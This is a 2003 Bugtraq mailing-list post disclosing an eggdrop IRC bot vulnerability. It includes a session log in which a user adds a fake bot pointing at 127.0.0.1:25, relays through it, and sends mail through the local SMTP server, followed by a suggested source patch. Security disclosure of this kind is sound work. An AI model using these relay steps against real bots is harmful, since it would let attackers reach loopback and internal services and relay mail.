Bugtraq mailing list archives
Eggdrop arbitrary connection vulnerability
From: Paul Starzetz <paul () starzetz de>
Date: Sun, 09 Feb 2003 20:44:50 +0100
Hi,there is a serious security problem in the popular eggdrop IRCbot. The hole allows a regular user with enough 'power' (at least power to add new bot records) to use any linked instance of the bot on the botnet as an instant 'proxy'. The following session demonstrates the problem with an out-of-the-box eggdrop 1.6.10:
.+bot bighole 127.0.0.1:25 [20:23] #IhaQuer# +bot bighole 127.0.0.1:25 Added bot 'bighole' with address '127.0.0.1:25' and no password.You'll want to add a hostmask if this bot will ever be on any channels that I'm on.
[20:23] #IhaQuer# match bighole *** Matching 'bighole': HANDLE PASS NOTES FLAGS LAST bighole no 0 b never (nowhere ) ADDRESS: 127.0.0.1 users: 25, bots: 25 --- Found 1 match. .relay bighole [20:23] #IhaQuer# relay bighole Connecting to bighole @ 127.0.0.1:25 ... (Type *BYE* on a line by itself to abort.) Success! NOW CONNECTED TO RELAY BOT bighole ... (You can type *BYE* to prematurely close the connection.) *** IhaQuer left the party line. 220 server.org ESMTP Postfix HELO blahblah.org 250 server.org MAIL from: blahblah.org 250 Ok rcpt to: ihaquer () gmx de 250 Ok data 354 End data with <CR><LF>.<CR><LF> blah blah . 250 Ok: queued as CFDFC2F012Obviously an email has been sent by the local postfix bound to the loopback address 127.0.0.1! The impact may depend on the host the bot is running on, including tunneling into internal networks, accessing services bound to the loopback only, bypassing TCP wrappers etc, etc.
There is no clean solution so far, for my own I decided to modify the net.c file and add something like:
int open_telnet_raw(int sock, char *server, int sport) . . . name.sin_family = AF_INET; name.sin_port = htons(port); + if(port < 1024 && port != 113) {+ putlog(LOG_MISC, "*", "WARNING attempt to connect to low port %s:%d", server, port);
+ return -1; + }Hope this helps, thanks to Maciek Kroenke for bringing my attention to this bug,
/ih
Current thread:
- Eggdrop arbitrary connection vulnerability Paul Starzetz (Feb 10)
- Re: Eggdrop arbitrary connection vulnerability D.C. van Moolenbroek (Feb 10)
- Re: Eggdrop arbitrary connection vulnerability Matthew S. Hallacy (Feb 11)